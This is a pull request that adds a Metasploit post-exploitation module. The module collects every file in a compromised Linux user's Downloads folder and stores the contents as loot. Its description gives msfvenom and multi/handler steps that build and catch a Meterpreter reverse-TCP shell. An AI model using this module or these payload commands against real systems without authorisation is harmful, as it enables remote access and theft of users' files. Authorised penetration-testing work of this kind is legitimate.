### PR TITLE
Module to obtain the contents of the Downloads directory

### DIFF
--- a/modules/post/linux/gather/enum_downloads.rb
+++ b/modules/post/linux/gather/enum_downloads.rb
@@ -1,0 +1,51 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Post
+  include Msf::Post::File
+  include Msf::Post::Linux::System
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'          => 'Linux Gather System and User Information',
+      'Description'   => %q{
+        This module lists downloads in the download directory, and sends them to the loot folder in /msf4.
+      },
+      'License'       => MSF_LICENSE,
+      'Author'        =>
+        [
+          'Liana Villafuerte <lvillafuerte2018[at]my.fit.edu>',
+          'Kourtnee Fernalld <kfernalld2018[at]my.fit.edu>',
+        ],
+      'Platform'      => ['linux'],
+      'SessionTypes'  => ['shell', 'meterpreter']
+    ))
+  end
+
+  def run
+
+    folder = execute("/bin/find ~/Downloads/ -type f -name \"*\"").split("\n")
+    #does not work for double extensions like .tar.gz
+    folder.each do |f|
+      print_status(f)
+      output=read_file(f).to_s
+      save(f, output)
+    end
+    
+  end
+
+  def save(file, data, ctype='')
+    ltype = 'linux.enum.conf'
+    fname = ::File.basename(file)
+    loot = store_loot(ltype, ctype, session, data, fname)
+    print_good("#{fname} stored in #{loot}")
+  end
+
+  def execute(cmd)
+    vprint_status("Execute: #{cmd}")
+    output = cmd_exec(cmd)
+    output
+  end
+end


### PR DESCRIPTION
A module to automatically pull the contents of the Downloads folder into the loot folder inside of /msf4.

List of the steps needed to make sure this thing works

Create the executable to run on target:
-[ ] msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST= <your IP> LPORT=4444 --format elf > msf.elf <or name the file whatever you'd like .elf>

- [ ] Start `msfconsole`
- [ ] `use exploit/multi/handler`
- [ ] 'set payload linux/x64/meterpreter_reverse_tcp'
- [ ] 'set LHOST 0.0.0.0'
- [ ] make sure the executable is running on the target
- [ ] 'run'
- [ ] 'run post/linux/gather/enum_downloads'